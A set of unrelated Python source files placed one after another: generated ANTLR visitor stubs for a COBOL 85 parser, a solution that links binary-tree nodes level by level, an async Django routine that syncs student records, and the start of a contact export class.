return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyRegular.
def visitMultiplyRegular(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyRegularOperand.
def visitMultiplyRegularOperand(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyGiving.
def visitMultiplyGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyGivingOperand.
def visitMultiplyGivingOperand(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multiplyGivingResult.
def visitMultiplyGivingResult(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openStatement.
def visitOpenStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openInputStatement.
def visitOpenInputStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openInput.
def visitOpenInput(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openOutputStatement.
def visitOpenOutputStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openOutput.
def visitOpenOutput(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openIOStatement.
def visitOpenIOStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#openExtendStatement.
def visitOpenExtendStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performStatement.
def visitPerformStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performInlineStatement.
def visitPerformInlineStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performProcedureStatement.
def visitPerformProcedureStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performType.
def visitPerformType(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performTimes.
def visitPerformTimes(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performUntil.
def visitPerformUntil(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performVarying.
def visitPerformVarying(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performVaryingClause.
def visitPerformVaryingClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performVaryingPhrase.
def visitPerformVaryingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performAfter.
def visitPerformAfter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performFrom.
def visitPerformFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performBy.
def visitPerformBy(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#performTestClause.
def visitPerformTestClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#purgeStatement.
def visitPurgeStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#readStatement.
def visitReadStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#readInto.
def visitReadInto(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#readWith.
def visitReadWith(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#readKey.
def visitReadKey(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveStatement.
def visitReceiveStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveFromStatement.
def visitReceiveFromStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveFrom.
def visitReceiveFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveIntoStatement.
def visitReceiveIntoStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveNoData.
def visitReceiveNoData(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveWithData.
def visitReceiveWithData(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveBefore.
def visitReceiveBefore(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveWith.
def visitReceiveWith(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveThread.
def visitReceiveThread(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveSize.
def visitReceiveSize(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#receiveStatus.
def visitReceiveStatus(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#releaseStatement.
def visitReleaseStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#returnStatement.
def visitReturnStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#returnInto.
def visitReturnInto(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rewriteStatement.
def visitRewriteStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#rewriteFrom.
def visitRewriteFrom(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#searchStatement.
def visitSearchStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#searchVarying.
def visitSearchVarying(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#searchWhen.
def visitSearchWhen(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendStatement.
def visitSendStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendStatementSync.
def visitSendStatementSync(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendStatementAsync.
def visitSendStatementAsync(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendFromPhrase.
def visitSendFromPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendWithPhrase.
def visitSendWithPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendReplacingPhrase.
def visitSendReplacingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendAdvancingPhrase.
def visitSendAdvancingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendAdvancingPage.
def visitSendAdvancingPage(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendAdvancingLines.
def visitSendAdvancingLines(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sendAdvancingMnemonic.
def visitSendAdvancingMnemonic(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setStatement.
def visitSetStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setToStatement.
def visitSetToStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setUpDownByStatement.
def visitSetUpDownByStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setTo.
def visitSetTo(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setToValue.
def visitSetToValue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#setByValue.
def visitSetByValue(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortStatement.
def visitSortStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortOnKeyClause.
def visitSortOnKeyClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortDuplicatesPhrase.
def visitSortDuplicatesPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortCollatingSequencePhrase.
def visitSortCollatingSequencePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortCollatingAlphanumeric.
def visitSortCollatingAlphanumeric(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortCollatingNational.
def visitSortCollatingNational(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortInputProcedurePhrase.
def visitSortInputProcedurePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortInputThrough.
def visitSortInputThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortUsing.
def visitSortUsing(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortOutputProcedurePhrase.
def visitSortOutputProcedurePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortOutputThrough.
def visitSortOutputThrough(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortGivingPhrase.
def visitSortGivingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sortGiving.
def visitSortGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#startStatement.
def visitStartStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#startKey.
def visitStartKey(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stopStatement.
def visitStopStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stopStatementGiving.
def visitStopStatementGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringStatement.
def visitStringStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringSendingPhrase.
def visitStringSendingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringSending.
def visitStringSending(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringDelimitedByPhrase.
def visitStringDelimitedByPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringForPhrase.
def visitStringForPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringIntoPhrase.
def visitStringIntoPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#stringWithPointerPhrase.
def visitStringWithPointerPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractStatement.
def visitSubtractStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractFromStatement.
def visitSubtractFromStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractFromGivingStatement.
def visitSubtractFromGivingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractCorrespondingStatement.
def visitSubtractCorrespondingStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractSubtrahend.
def visitSubtractSubtrahend(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractMinuend.
def visitSubtractMinuend(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractMinuendGiving.
def visitSubtractMinuendGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractGiving.
def visitSubtractGiving(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subtractMinuendCorresponding.
def visitSubtractMinuendCorresponding(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#terminateStatement.
def visitTerminateStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringStatement.
def visitUnstringStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringSendingPhrase.
def visitUnstringSendingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringDelimitedByPhrase.
def visitUnstringDelimitedByPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringOrAllPhrase.
def visitUnstringOrAllPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringIntoPhrase.
def visitUnstringIntoPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringInto.
def visitUnstringInto(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringDelimiterIn.
def visitUnstringDelimiterIn(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringCountIn.
def visitUnstringCountIn(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringWithPointerPhrase.
def visitUnstringWithPointerPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#unstringTallyingPhrase.
def visitUnstringTallyingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#useStatement.
def visitUseStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#useAfterClause.
def visitUseAfterClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#useAfterOn.
def visitUseAfterOn(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#useDebugClause.
def visitUseDebugClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#useDebugOn.
def visitUseDebugOn(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeStatement.
def visitWriteStatement(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeFromPhrase.
def visitWriteFromPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeAdvancingPhrase.
def visitWriteAdvancingPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeAdvancingPage.
def visitWriteAdvancingPage(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeAdvancingLines.
def visitWriteAdvancingLines(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeAdvancingMnemonic.
def visitWriteAdvancingMnemonic(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeAtEndOfPagePhrase.
def visitWriteAtEndOfPagePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#writeNotAtEndOfPagePhrase.
def visitWriteNotAtEndOfPagePhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#atEndPhrase.
def visitAtEndPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#notAtEndPhrase.
def visitNotAtEndPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#invalidKeyPhrase.
def visitInvalidKeyPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#notInvalidKeyPhrase.
def visitNotInvalidKeyPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#onOverflowPhrase.
def visitOnOverflowPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#notOnOverflowPhrase.
def visitNotOnOverflowPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#onSizeErrorPhrase.
def visitOnSizeErrorPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#notOnSizeErrorPhrase.
def visitNotOnSizeErrorPhrase(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#onExceptionClause.
def visitOnExceptionClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#notOnExceptionClause.
def visitNotOnExceptionClause(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#arithmeticExpression.
def visitArithmeticExpression(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#plusMinus.
def visitPlusMinus(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multDivs.
def visitMultDivs(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#multDiv.
def visitMultDiv(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#powers.
def visitPowers(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#power.
def visitPower(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#basis.
def visitBasis(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#condition.
def visitCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#andOrCondition.
def visitAndOrCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#combinableCondition.
def visitCombinableCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#simpleCondition.
def visitSimpleCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#classCondition.
def visitClassCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#conditionNameReference.
def visitConditionNameReference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#conditionNameSubscriptReference.
def visitConditionNameSubscriptReference(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationCondition.
def visitRelationCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationSignCondition.
def visitRelationSignCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationArithmeticComparison.
def visitRelationArithmeticComparison(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationCombinedComparison.
def visitRelationCombinedComparison(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationCombinedCondition.
def visitRelationCombinedCondition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#relationalOperator.
def visitRelationalOperator(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#abbreviation.
def visitAbbreviation(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#identifier.
def visitIdentifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#tableCall.
def visitTableCall(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#functionCall.
def visitFunctionCall(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#referenceModifier.
def visitReferenceModifier(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#characterPosition.
def visitCharacterPosition(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#length.
def visitLength(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#subscript.
def visitSubscript(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#argument.
def visitArgument(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedDataName.
def visitQualifiedDataName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedDataNameFormat1.
def visitQualifiedDataNameFormat1(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedDataNameFormat2.
def visitQualifiedDataNameFormat2(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedDataNameFormat3.
def visitQualifiedDataNameFormat3(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedDataNameFormat4.
def visitQualifiedDataNameFormat4(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#qualifiedInData.
def visitQualifiedInData(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inData.
def visitInData(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inFile.
def visitInFile(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inMnemonic.
def visitInMnemonic(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inSection.
def visitInSection(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inLibrary.
def visitInLibrary(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#inTable.
def visitInTable(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#alphabetName.
def visitAlphabetName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#assignmentName.
def visitAssignmentName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#basisName.
def visitBasisName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cdName.
def visitCdName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#className.
def visitClassName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#computerName.
def visitComputerName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#conditionName.
def visitConditionName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataName.
def visitDataName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#dataDescName.
def visitDataDescName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#environmentName.
def visitEnvironmentName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#fileName.
def visitFileName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#functionName.
def visitFunctionName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#indexName.
def visitIndexName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#languageName.
def visitLanguageName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#libraryName.
def visitLibraryName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#localName.
def visitLocalName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#mnemonicName.
def visitMnemonicName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#paragraphName.
def visitParagraphName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#procedureName.
def visitProcedureName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#programName.
def visitProgramName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#recordName.
def visitRecordName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#reportName.
def visitReportName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#routineName.
def visitRoutineName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#screenName.
def visitScreenName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#sectionName.
def visitSectionName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#systemName.
def visitSystemName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#symbolicCharacter.
def visitSymbolicCharacter(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#textName.
def visitTextName(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cobolWord.
def visitCobolWord(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#literal.
def visitLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#booleanLiteral.
def visitBooleanLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#numericLiteral.
def visitNumericLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#integerLiteral.
def visitIntegerLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cicsDfhRespLiteral.
def visitCicsDfhRespLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#cicsDfhValueLiteral.
def visitCicsDfhValueLiteral(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#figurativeConstant.
def visitFigurativeConstant(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#specialRegister.
def visitSpecialRegister(self, ctx):
return self.visitChildren(ctx)
# Visit a parse tree produced by Cobol85Parser#commentEntry.
def visitCommentEntry(self, ctx):
return self.visitChildren(ctx)
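
# Illustrative usage sketch (not part of the generated file). A typical
# pattern for a generated ANTLR visitor: subclass it, override only the
# visit methods you need, and delegate the rest to visitChildren. The
# lexer import, the visitor base-class name, and the start rule below are
# assumptions based on standard "antlr4 -visitor" output, not this file.
#
# from antlr4 import InputStream, CommonTokenStream
# from Cobol85Lexer import Cobol85Lexer
#
# class SortStatementCounter(Cobol85Visitor):      # assumed base-class name
#     def __init__(self):
#         self.count = 0
#
#     def visitSortStatement(self, ctx):
#         self.count += 1                          # count each SORT statement
#         return self.visitChildren(ctx)           # keep walking the subtree
#
# lexer = Cobol85Lexer(InputStream(cobol_source))
# parser = Cobol85Parser(CommonTokenStream(lexer))
# visitor = SortStatementCounter()
# visitor.visit(parser.startRule())                # start rule name is assumed
# print(visitor.count)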
|
from collections import deque
# Definition for a Node.
class Node:
def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):
self.val = val
self.left = left
self.right = right
self.next = next
class Solution:
    def BFS(self, root):
        # Level-order traversal: within one level, the node that will be
        # popped next from the queue is the current node's right neighbour.
        q = deque()
        q.append(root)
        while q:
            length = len(q)
            for i in range(length):
                node = q.popleft()
                # Link to the next node on this level, or None at the level's end.
                node.next = q[0] if i != length - 1 else None
if node.left is not None:
q.append(node.left)
if node.right is not None:
q.append(node.right)
def DFS(self, node):
if node is None:
return
if node.left is not None: # node has two children
node.left.next = node.right # link left child
node.right.next = node.next.left if node.next is not None else None # link right child
self.DFS(node.left)
self.DFS(node.right)
def connect(self, root: 'Node') -> 'Node':
if root is None:
# raise Exception("Empty Tree")
return None
# self.BFS(root)
self.DFS(root)
return root
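
# Illustrative usage sketch (assumption: run as a script, not part of the
# original solution). Builds a three-level perfect binary tree and prints
# each level by following the next pointers set by connect().
if __name__ == "__main__":
    nodes = {i: Node(i) for i in range(1, 8)}
    for parent, (l, r) in {1: (2, 3), 2: (4, 5), 3: (6, 7)}.items():
        nodes[parent].left, nodes[parent].right = nodes[l], nodes[r]
    root = Solution().connect(nodes[1])
    level_start = root
    while level_start:
        node, vals = level_start, []
        while node:
            vals.append(node.val)
            node = node.next
        print(vals)            # [1], then [2, 3], then [4, 5, 6, 7]
        level_start = level_start.left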
|
import asyncio
from channels.db import database_sync_to_async
from students.models import Student
from students.utilities.starters import student_sync
from syncing.models import Signup
from syncing.utilities.status_codes import SignupStatusCodes
async def gather_with_concurrency(tasks, limit=32):
semaphore = asyncio.Semaphore(limit)
async def sem_task(task):
async with semaphore:
return await task
return await asyncio.gather(*(sem_task(task) for task in tasks))
@database_sync_to_async
def get_all_students() -> list:
return list(Student.objects.all().values("roll_number", "std_pass"))
@database_sync_to_async
def create_signup_for_student(roll_number, semester_list):
user = Student.objects.get(roll_number=roll_number)
signup_obj = Signup.objects.create(
student=user,
logs=SignupStatusCodes.NOT_YET_STARTED.value,
attendance_pending=semester_list,
result_pending=semester_list,
)
return signup_obj
async def sequence_starter(message):
students = await get_all_students()
    tasks = []
    for student in students:
        # Append bare coroutines instead of wrapping them in
        # asyncio.create_task(): a created task starts running immediately,
        # which would bypass the concurrency limit in gather_with_concurrency.
        tasks.append(
            student_sync(
                roll_number=student["roll_number"],
                password=student["std_pass"],
                isSyncing=True,
                message=message,
            )
        )
res = await gather_with_concurrency(tasks)
att_res_coroutines = [j for sub in res for j in sub]
await gather_with_concurrency(att_res_coroutines, limit=24)
message("Process Completed", "success")
async def admin_sync(roll_number, semester_list, message):
signup = await create_signup_for_student(roll_number, semester_list)
res = await student_sync(
roll_number=signup.student.roll_number,
password=signup.student.std_pass,
isSyncing=False,
message=message,
)
await gather_with_concurrency(res)
message("Process Completed", "success")
|
from collections import OrderedDict
from ananta.exports import BaseExport
class ContactExport(BaseExport):
def export_data(self):
export_data = OrderedDict((
